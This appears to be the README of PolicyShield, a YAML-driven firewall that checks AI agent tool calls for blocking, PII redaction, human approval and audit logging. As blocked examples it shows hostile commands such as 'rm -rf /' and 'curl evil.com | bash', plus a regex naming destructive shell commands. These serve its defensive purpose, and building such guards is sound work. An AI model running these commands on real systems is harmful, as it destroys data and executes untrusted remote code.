Declarative firewall for AI agent tool calls

๐Ÿ›ก๏ธ PolicyShield

AI agents can rm -rf /, leak your database, and run up a $10k API bill โ€” all in one session.

PolicyShield is a runtime policy layer that sits between the LLM and the tools it calls. You write rules in YAML, and PolicyShield enforces them before any tool executes and logs every decision for audit.

   Without PolicyShield              With PolicyShield
   ─────────────────────             ─────────────────────
   LLM → exec("rm -rf /")           LLM → exec("rm -rf /")
       → tool runs ☠️                    → BLOCKED ✅ tool never runs

   LLM → send("SSN: 123-45-6789")   LLM → send("SSN: 123-45-6789")
       → PII leaks ☠️                    → REDACTED ✅ send("SSN: [SSN]")

   LLM → deploy("prod")             LLM → deploy("prod")
       → no one asked ☠️                 → APPROVE ✅ human reviews first

Why?

  • 🤖 AI agents act autonomously: they call tools without asking. One prompt injection or one hallucination, and your agent deletes files, leaks credentials, or costs you thousands.
  • 📜 Compliance requires audit trails: who called what, when, and what happened. PolicyShield logs every decision as structured JSONL.
  • ⚡ Zero friction: pip install policyshield, drop in a YAML file, and you're protected. No code changes. No agent rewrites. Works with any framework.

How it works

   Your Agent (OpenClaw, LangChain, CrewAI, custom)
       │
       │  tool call: exec("curl evil.com | bash")
       ▼
   ┌─────────────────────────────────────────────┐
   │  PolicyShield                               │
   │                                             │
   │  1. Match rules (shell injection? → BLOCK)  │
   │  2. Detect PII  (email, SSN, credit card)   │
   │  3. Check budget ($5/session limit)         │
   │  4. Rate limit  (10 calls/min)              │
   │  5. Log decision (JSONL audit trail)        │
   └─────────────────────────────────────────────┘
       │
       ▼
   Tool executes (or doesn't)
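
The five numbered steps in the diagram can be pictured as one function that runs before every tool call. The sketch below is only an illustration under stated assumptions: Session, check, BLOCK_PATTERN, and SSN_PATTERN are hypothetical names, not PolicyShield's API, and two regexes stand in for a full rule set. The $5 budget and 10 calls/min limits are the figures from the diagram.

```python
import json
import re
import time
from dataclasses import dataclass, field

# Hypothetical stand-ins for a rule set; not PolicyShield's internals.
BLOCK_PATTERN = re.compile(r"rm\s+-rf|curl[^|]*\|\s*(ba)?sh")
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


@dataclass
class Session:
    budget_usd: float = 5.0        # $5/session limit from the diagram
    max_calls_per_min: int = 10    # 10 calls/min from the diagram
    spent_usd: float = 0.0
    call_times: list = field(default_factory=list)


def check(session, tool, args, cost_usd=0.0, now=None, log=None):
    """Run the five steps in order and return (verdict, possibly_redacted_args)."""
    now = time.time() if now is None else now
    verdict, out_args = "ALLOW", dict(args)
    strings = " ".join(v for v in args.values() if isinstance(v, str))

    if BLOCK_PATTERN.search(strings):            # 1. match rules
        verdict = "BLOCK"
    elif SSN_PATTERN.search(strings):            # 2. detect PII
        verdict = "REDACT"
        out_args = {
            k: SSN_PATTERN.sub("[SSN]", v) if isinstance(v, str) else v
            for k, v in args.items()
        }

    recent = [t for t in session.call_times if now - t < 60]
    if verdict != "BLOCK":
        if session.spent_usd + cost_usd > session.budget_usd:   # 3. budget
            verdict = "BLOCK"
        elif len(recent) >= session.max_calls_per_min:          # 4. rate limit
            verdict = "BLOCK"

    if verdict != "BLOCK":                       # only permitted calls count
        session.spent_usd += cost_usd
        session.call_times = recent + [now]

    if log is not None:                          # 5. one JSON object per line
        log.append(json.dumps({"ts": now, "tool": tool, "verdict": verdict}))
    return verdict, out_args


session, audit = Session(), []
print(check(session, "exec", {"command": "rm -rf /"}, now=0.0, log=audit))
print(check(session, "send", {"text": "SSN: 123-45-6789"}, now=1.0, log=audit))
```

In this sketch a blocked call consumes neither budget nor rate-limit quota; whether PolicyShield itself accounts for blocked calls that way is not stated here.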

PyPI Version Python 3.10+ License: MIT CI Docs Coverage npm Security Policy


🔌 Built for OpenClaw

OpenClaw is an open-source AI agent framework that lets LLMs call tools: shell commands, file operations, API calls, database queries. Out of the box, there are no guardrails: the LLM decides what to run, and the tool runs.

PolicyShield plugs into OpenClaw as a sidecar. Every tool call goes through PolicyShield first. If the call violates a rule, it's blocked, redacted, or sent for human approval before the tool ever executes.

# Install, then run one setup command: installs the plugin, generates 11 security rules, starts the server
pip install "policyshield[server]"
policyshield openclaw setup

That's it. Your OpenClaw agent is now protected with rules that block rm -rf and curl | bash, detect PII, and require approval for sensitive operations.

Also works with LangChain, CrewAI, FastAPI, or any other framework via the Python SDK or HTTP API. See Integrations.


Installation

pip install policyshield

# With HTTP server (for OpenClaw and other integrations)
pip install "policyshield[server]"

# With AI rule generation (OpenAI / Anthropic)
pip install "policyshield[ai]"

Or from source:

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
pip install -e ".[dev,server]"

Quick Start (Standalone)

Step 1. Create a rules file rules.yaml:

shield_name: my-agent
version: 1
rules:
  - id: no-delete
    when:
      tool: delete_file
    then: block
    message: "File deletion is not allowed."

  - id: redact-pii
    when:
      tool: [web_fetch, send_message]
    then: redact
    message: "PII redacted before sending."

Step 2. Use in Python:

from policyshield.shield.engine import ShieldEngine

engine = ShieldEngine(rules="rules.yaml")

# This will be blocked:
result = engine.check("delete_file", {"path": "/data"})
print(result.verdict)  # Verdict.BLOCK
print(result.message)  # "File deletion is not allowed."

# This will redact PII from args:
result = engine.check("send_message", {"text": "Email me at john@corp.com"})
print(result.verdict)  # Verdict.REDACT
print(result.modified_args)  # {"text": "Email me at [EMAIL]"}

Step 3. Validate your rules:

policyshield validate rules.yaml
policyshield lint rules.yaml

Or scaffold a full project:

# Secure preset: default BLOCK, fail-closed, 5 built-in detectors
policyshield init --preset secure --no-interactive

# Check your security posture
policyshield doctor

⚡ OpenClaw Integration

PolicyShield works as a sidecar to OpenClaw: it intercepts every tool call the LLM makes and enforces your rules before the tool executes.

  OpenClaw Agent                PolicyShield Server
  ┌──────────────┐              ┌──────────────────┐
  │  LLM calls   │  HTTP check  │  11 YAML rules   │
  │  exec("rm…") │────────────→ │  ↓               │
  │              │   BLOCK ←────│  match → verdict │
  │  Tool NOT    │              │                  │
  │  executed    │              │  PII detection   │
  └──────────────┘              │  Rate limiting   │
                                │  Audit trail     │
                                └──────────────────┘

Verified with OpenClaw 2026.2.13 and PolicyShield 0.10.0.

Quick Setup (one command)

pip install "policyshield[server]"
policyshield openclaw setup

This runs 5 steps automatically:

Step  What happens
────  ────────────
1     Generates 11 preset rules in policies/rules.yaml (block rm -rf, curl|sh, redact PII, etc.)
2     Starts the PolicyShield HTTP server on port 8100
3     Downloads @policyshield/openclaw-plugin from npm into ~/.openclaw/extensions/
4     Writes plugin config to ~/.openclaw/openclaw.json
5     Verifies the server is healthy and rules are loaded

To stop: policyshield openclaw teardown

Manual Setup (step by step)

If you prefer to understand each step:

1. Install PolicyShield and generate rules:

pip install "policyshield[server]"
policyshield init --preset openclaw

This creates policies/rules.yaml with 11 rules for blocking dangerous commands and redacting PII.

2. Start the server (in a separate terminal):

policyshield server --rules policies/rules.yaml --port 8100

Verify: curl http://localhost:8100/api/v1/health → {"status":"ok","rules_count":11,"mode":"ENFORCE"}
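
The same health check can be scripted, for instance as a readiness gate before launching the agent. This is a minimal sketch that assumes only the response shape shown above; fetch_health and is_ready are hypothetical helper names, not part of PolicyShield.

```python
import json
import urllib.request


def fetch_health(base_url="http://localhost:8100", timeout=2.0):
    """GET /api/v1/health from a running server and return the decoded JSON."""
    with urllib.request.urlopen(f"{base_url}/api/v1/health", timeout=timeout) as resp:
        return json.load(resp)


def is_ready(health, expected_rules=11):
    """True when status is ok, mode is ENFORCE, and the rule count matches."""
    return (
        health.get("status") == "ok"
        and health.get("rules_count") == expected_rules
        and health.get("mode") == "ENFORCE"
    )


# Offline demonstration using the sample response from the step above.
sample = json.loads('{"status":"ok","rules_count":11,"mode":"ENFORCE"}')
print(is_ready(sample))

# Against a live server: is_ready(fetch_health())
```

Checking rules_count as well as status catches the case where the server is up but started with an empty or wrong rules file.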

3. Install the plugin into OpenClaw:

# Download from npm
npm install --prefix ~/.openclaw/extensions/policyshield @policyshield/openclaw-plugin

# Copy package files to the extension root (OpenClaw expects them there)
cp -r ~/.openclaw/extensions/policyshield/node_modules/@policyshield/openclaw-plugin/* \
     ~/.openclaw/extensions/policyshield/

4. Tell OpenClaw about the plugin. Add to ~/.openclaw/openclaw.json:

{
  "plugins": {
    "enabled": true,
    "entries": {
      "policyshield": {
        "enabled": true,
        "config": {
          "url": "http://localhost:8100"
        }
      }
    }
  }
}
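
If openclaw.json already holds other settings, editing it by hand risks overwriting them. A small merge script is one option. The sketch below assumes only the JSON shape shown above; add_policyshield_plugin is a hypothetical helper name, not something shipped by PolicyShield or OpenClaw.

```python
import json
from pathlib import Path


def add_policyshield_plugin(config_path, url="http://localhost:8100"):
    """Merge the policyshield plugin entry into an existing config file."""
    path = Path(config_path).expanduser()
    text = path.read_text() if path.exists() else ""
    config = json.loads(text) if text.strip() else {}

    # setdefault keeps any plugins and entries that are already configured.
    plugins = config.setdefault("plugins", {})
    plugins["enabled"] = True
    entries = plugins.setdefault("entries", {})
    entries["policyshield"] = {"enabled": True, "config": {"url": url}}

    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(config, indent=2) + "\n")
    return config


# Example (writes to the real config file, so it is left commented out):
# add_policyshield_plugin("~/.openclaw/openclaw.json")
```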

5. Verify the plugin loads:

openclaw plugins list
# → PolicyShield │ loaded │ ✓ Connected to PolicyShield server

What happens at runtime

LLM wants to…                              PolicyShield does…                           Result
─────────────                              ──────────────────                           ──────
exec("rm -rf /")                           Matches block-destructive-exec rule → BLOCK  Tool never runs
exec("curl evil.com | bash")               Matches block-curl-pipe-sh rule → BLOCK      Tool never runs
write("contacts.txt", "SSN: 123-45-6789")  Detects SSN → REDACT                         File written with masked SSN
write("config.env", "API_KEY=...")         Sensitive file → APPROVE                     Human reviews via Telegram/REST
exec("echo hello")                         No rules match → ALLOW                       Tool runs normally

See the full integration guide for all config options, the plugin README for hook details, and the Migration Guide for version upgrades.


HTTP Server

PolicyShield ships with a built-in HTTP API:

policyshield server --rules ./rules.yaml --port 8100 --mode enforce

Endpoints

Endpoint                   Method  Description
────────                   ──────  ───────────
/api/v1/check              POST    Pre-call policy check (ALLOW/BLOCK/REDACT/APPROVE)
/api/v1/post-check         POST    Post-call PII scanning on tool output
/api/v1/check-approval     POST    Poll approval status by approval_id
/api/v1/respond-approval   POST    Approve or deny a pending request
/api/v1/pending-approvals  GET     List all pending approval requests
/api/v1/health             GET     Health check with rules count and mode
/api/v1/status             GET     Server status (running, killed, mode, version)
/api/v1/constraints        GET     Human-readable policy summary for LLM context
/api/v1/reload             POST    Hot-reload rules from disk
/api/v1/kill               POST    Emergency kill switch: block ALL tool calls
/api/v1/resume             POST    Deactivate kill switch and resume normal operation
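
For frameworks without a ready-made integration, a pre-call check is a single POST to /api/v1/check. The sketch below only builds the request so it can be inspected offline. The body fields tool_name, args, and session_id are assumptions made for illustration, as are the helper names build_check_request and may_execute; confirm the real request and response schema in the project documentation before relying on them.

```python
import json
import urllib.request

BASE_URL = "http://localhost:8100"  # port used in the examples above


def build_check_request(tool, args, session_id="demo-session"):
    """Build (but do not send) a POST to /api/v1/check.

    ASSUMPTION: the field names in the JSON body are illustrative only.
    """
    body = json.dumps({"tool_name": tool, "args": args, "session_id": session_id})
    return urllib.request.Request(
        f"{BASE_URL}/api/v1/check",
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def may_execute(verdict):
    """ALLOW and REDACT let the tool run; BLOCK and APPROVE hold it back."""
    return verdict in {"ALLOW", "REDACT"}


req = build_check_request("exec", {"command": "echo hello"})
print(req.get_method(), req.full_url)

# To send it against a running server:
# with urllib.request.urlopen(req, timeout=2) as resp:
#     decision = json.load(resp)
```

A REDACT verdict lets the call proceed only with the masked arguments, and APPROVE means waiting for a human decision, which is what the check-approval endpoint is for.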

Docker

docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules.yaml:/app/rules.yaml policyshield-server

Rules DSL

rules:
  # Block by tool name and argument pattern
  - id: no-destructive-shell
    when:
      tool: exec
      args_match:
        command: { regex: "rm\\s+-rf|mkfs|dd\\s+if=" }
    then: block
    severity: critical

  # Redact PII across multiple tools at once
  - id: no-external-pii
    when:
      tool: [web_fetch, web_search, send_email]
    then: redact

  # Human approval required
  - id: approve-file-delete
    when:
      tool: delete_file
    then: approve
    approval_strategy: per_rule

  # Session-based conditions
  - id: rate-limit-exec
    when:
      tool: exec
      session:
        tool_count.exec: { gt: 60 }
    then: block
    message: "exec rate limit exceeded"

  # Chain rule: detect data exfiltration
  - id: anti-exfiltration
    when:
      tool: send_email
      chain:
        - tool: read_database
          within_seconds: 120
    then: block
    severity: critical
    message: "Potential data exfiltration: read_database → send_email"

# Rate limiting
rate_limits:
  - tool: web_fetch
    max_calls: 10
    window_seconds: 60
    per_session: true

# Custom PII patterns
pii_patterns:
  - name: EMPLOYEE_ID
    pattern: "EMP-\\d{6}"
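
The chain rule above fires when send_email follows a read_database call within 120 seconds. One way to picture that temporal condition is a scan over the session's recent calls. This is a sketch of the idea only: Call and chain_matches are hypothetical names, and PolicyShield's actual matching logic may differ.

```python
from dataclasses import dataclass


@dataclass
class Call:
    tool: str
    timestamp: float  # seconds since the session started


def chain_matches(history, current, trigger_tool, prior_tool, within_seconds):
    """True if `current` is the trigger tool and the prior tool ran inside the window."""
    if current.tool != trigger_tool:
        return False
    return any(
        past.tool == prior_tool
        and 0 <= current.timestamp - past.timestamp <= within_seconds
        for past in history
    )


history = [Call("read_database", 100.0)]

# 60 seconds after the read: inside the 120-second window, so the rule fires.
print(chain_matches(history, Call("send_email", 160.0), "send_email", "read_database", 120))

# 200 seconds after the read: outside the window, so the rule does not fire.
print(chain_matches(history, Call("send_email", 300.0), "send_email", "read_database", 120))
```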

Built-in PII detection: EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns.
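
Regex-based redaction with a custom pattern can be sketched in a few lines. The EMPLOYEE_ID pattern is the one from the YAML above; the EMAIL and SSN regexes here are simplified stand-ins chosen for the example, not PolicyShield's built-in patterns, and redact is a hypothetical function name.

```python
import re

# Simplified illustrative patterns; real detectors are likely stricter.
PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "EMPLOYEE_ID": re.compile(r"EMP-\d{6}"),  # custom pattern from pii_patterns
}


def redact(text):
    """Replace each match with [NAME] and return (redacted_text, names_found)."""
    found = []
    for name, pattern in PATTERNS.items():
        text, count = pattern.subn(f"[{name}]", text)
        if count:
            found.append(name)
    return text, found


print(redact("Email me at john@corp.com"))
print(redact("Badge EMP-123456, SSN: 123-45-6789"))
```

Returning the list of matched pattern names alongside the text makes it easy to record which PII types were seen without writing the raw values to a log.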


Features

Core

Category            What you get
────────            ────────────
YAML DSL            Declarative rules with regex, glob, exact match, session conditions
Verdicts            ALLOW · BLOCK · REDACT · APPROVE (human-in-the-loop)
PII Detection       EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns
Built-in Detectors  Path traversal, shell injection, SQL injection, SSRF, URL schemes (zero-config)
Kill Switch         policyshield kill / POST /api/v1/kill: block ALL calls instantly
Chain Rules         Temporal conditions (when.chain) that detect multi-step attack patterns
Rate Limiting       Per-tool, per-session, global, and adaptive (burst detection) rate limiting
Approval Flow       InMemory and Telegram backends with circuit breaker and health checks
Hot Reload          File-watcher auto-reloads rules on change
Trace & Audit       JSONL log, search, stats, violations, CSV/HTML export, rotation & retention

Server & Integrations

Category         What you get
────────         ────────────
HTTP Server      FastAPI server with TLS, API rate limiting, and 11 REST endpoints
OpenClaw Plugin  Native plugin with before/after hooks and policy injection
Async Engine     Full async/await support for FastAPI, aiohttp, async agents
Input Sanitizer  Normalize args, block prompt injection patterns
Output Policy    Post-call response scanning with block patterns and size limits
Honeypot Tools   Decoy tools that trigger on prompt injection; always block, even in AUDIT mode
Docker           Container-ready with Dockerfile.server and docker-compose

Developer Experience

Category             What you get
────────             ────────────
Doctor               policyshield doctor: 10-check health scan with A-F security grading
Auto-Rules           policyshield generate-rules --from-openclaw: zero-config rule generation
Rule Testing         YAML test cases for policies (policyshield test)
Rule Linter          Static analysis: 7 checks + multi-file validation + dead rule detection
Replay & Simulation  Re-run JSONL traces against new rules (policyshield replay)

Advanced features (shadow mode, canary, dashboards, OTel, etc.)

Category            What you get
────────            ────────────
Rule Composition    include: / extends: for rule inheritance and modularity
Plugin System       Extensible detector API: register custom detectors without forking
Budget Caps         USD-based per-session and per-hour cost limits
Shadow Mode         Test new rules in production (dual-path evaluation, no blocking)
Canary Deployments  Roll out rules to N% of sessions, auto-promote after duration
Dynamic Rules       Fetch rules from HTTP/HTTPS with periodic refresh
OpenTelemetry       OTLP export to Jaeger/Grafana (spans + metrics)
AI Rule Writer      Generate YAML rules from natural language (policyshield generate)
Cost Estimator      Token/dollar cost estimation per tool call and model
Alert Engine        5 condition types with Console, Webhook, Slack, Telegram backends
Dashboard           FastAPI REST API + WebSocket live stream + dark-themed SPA
Prometheus          /metrics endpoint with per-tool, PII, and approval labels + Grafana preset
Compliance Reports  HTML reports: verdicts, violations, PII stats, rule coverage
Incident Timeline   Chronological session timeline for post-mortems
Config Migration    policyshield migrate: auto-migrate YAML between versions

Other Integrations

LangChain

from policyshield.integrations.langchain import PolicyShieldTool, shield_all_tools

safe_tool = PolicyShieldTool(wrapped_tool=my_tool, engine=engine)
safe_tools = shield_all_tools([tool1, tool2], engine)

CrewAI

from policyshield.integrations.crewai import shield_crewai_tools

safe_tools = shield_crewai_tools([tool1, tool2], engine)

CLI

policyshield validate ./policies/          # Validate rules
policyshield lint ./policies/rules.yaml    # Static analysis (7 checks)
policyshield test ./policies/              # Run YAML test cases

policyshield server --rules ./rules.yaml   # Start HTTP server
policyshield server --rules ./rules.yaml --port 8100 --mode audit
policyshield server --rules ./rules.yaml --tls-cert cert.pem --tls-key key.pem

policyshield trace show ./traces/trace.jsonl
policyshield trace violations ./traces/trace.jsonl
policyshield trace stats --dir ./traces/ --format json
policyshield trace search --tool exec --verdict BLOCK
policyshield trace cost --dir ./traces/ --model gpt-4o
policyshield trace export ./traces/trace.jsonl -f html

# Launch the live web dashboard
policyshield trace dashboard --port 8000 --prometheus

# Replay traces against new rules
policyshield replay ./traces/trace.jsonl --rules ./new-rules.yaml --changed-only

# Simulate a rule without traces
policyshield simulate --rule new_rule.yaml --tool exec --args '{"cmd":"ls"}'

# Generate rules from templates (offline)
policyshield generate --template --tools delete_file send_email -o rules.yaml

# Generate rules with AI (requires OPENAI_API_KEY)
policyshield generate "Block all file deletions and require approval for deploys"

# Auto-generate rules from OpenClaw or tool list
policyshield generate-rules --from-openclaw --url http://localhost:3000
policyshield generate-rules --tools exec,write_file,delete_file -o policies/rules.yaml

# Compliance report for auditors
policyshield report --traces ./traces/ --format html

# Incident timeline for post-mortems
policyshield incident session_abc123 --format html

# Config migration between versions
policyshield migrate --from 0.11 --to 1.0 rules.yaml

# Kill switch: emergency stop
policyshield kill --port 8100 --reason "Incident response"
policyshield resume --port 8100

# Health check
policyshield doctor --config policyshield.yaml --rules rules.yaml
policyshield doctor --json

# Initialize a new project
policyshield init --preset secure --no-interactive

Docker

# Run the HTTP server
docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules:/app/rules policyshield-server

# Validate rules
docker compose run policyshield validate policies/

# Lint rules
docker compose run lint

# Run tests
docker compose run test

Examples

Example              Description
───────              ───────────
langchain_demo.py    LangChain tool wrapping
async_demo.py        Async engine usage
openclaw_rules.yaml  OpenClaw preset rules (11 rules)
chain_rules.yaml     Chain rule examples (anti-exfiltration, retry storm)
policies/            Production-ready rule sets (security, compliance, full)

Community Rule Packs

Pack          Rules  Focus
────          ─────  ─────
gdpr.yaml     8      EU data protection, cross-border transfers
hipaa.yaml    9      PHI protection, patient record safety
pci-dss.yaml  9      Cardholder data, payment gateway enforcement

How does PolicyShield compare to alternatives? See the Comparison page.


Benchmarks

Measured on commodity hardware (Apple M-series, Python 3.13). Target: <5ms sync, <10ms async.

Operation           p50     p99     Target
─────────           ───     ───     ──────
Sync check (ALLOW)  0.01ms  0.01ms  <5ms ✅
Sync check (BLOCK)  0.01ms  0.01ms  <5ms ✅
Async check         0.05ms  0.10ms  <10ms ✅

Run benchmarks yourself:

pytest tests/test_benchmark.py -m benchmark -v -s
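
For a rough sense of how p50 and p99 figures like these are derived, per-call latencies can be collected with a monotonic timer and cut into percentiles. This is a generic sketch, not the project's benchmark harness: measure_ms is a hypothetical helper, and the lambda is a stand-in for a real policy check.

```python
import statistics
import time


def measure_ms(fn, iterations=10_000):
    """Time fn() repeatedly and return p50 and p99 latency in milliseconds."""
    samples = []
    for _ in range(iterations):
        start = time.perf_counter()
        fn()
        samples.append((time.perf_counter() - start) * 1000.0)
    # n=100 yields 99 cut points: index 49 is the median, index 98 is p99.
    cuts = statistics.quantiles(samples, n=100)
    return {"p50": cuts[49], "p99": cuts[98]}


# Stand-in workload; swap in a real check call to measure it.
result = measure_ms(lambda: "rm -rf" in "echo hello", iterations=2_000)
print(f"p50={result['p50']:.4f}ms p99={result['p99']:.4f}ms")
```

Numbers from a loop like this vary with machine load and warm-up, so they are best compared against the targets rather than against the exact values in the table.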

Troubleshooting

Problem                                 Solution
───────                                 ────────
Connection refused on plugin install    Start the PolicyShield server first: policyshield server --rules rules.yaml
Server starts but plugin gets timeouts  Check that the port matches (default is 8100). Configure in OpenClaw: openclaw config set plugins.policyshield.url http://localhost:8100
Rules not reloading after edit          Hot-reload watches the file passed to --rules. Alternatively, call POST /api/v1/reload manually.
policyshield: command not found         Install with the server extra: pip install "policyshield[server]"
PII not detected in non-English text    The current PII detector is regex-based (L0). RU patterns (INN, SNILS, passport) are supported. NER-based L1 detection is on the roadmap.

For OpenClaw-specific issues, see the full integration guide. For upgrading between versions, see the Compatibility & Migration Guide.


Development

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev,server]"

pytest tests/ -v                 # 1192+ tests
ruff check policyshield/ tests/  # Lint
ruff format --check policyshield/ tests/  # Format check

📖 Documentation: mishabar410.github.io/PolicyShield


License

MIT
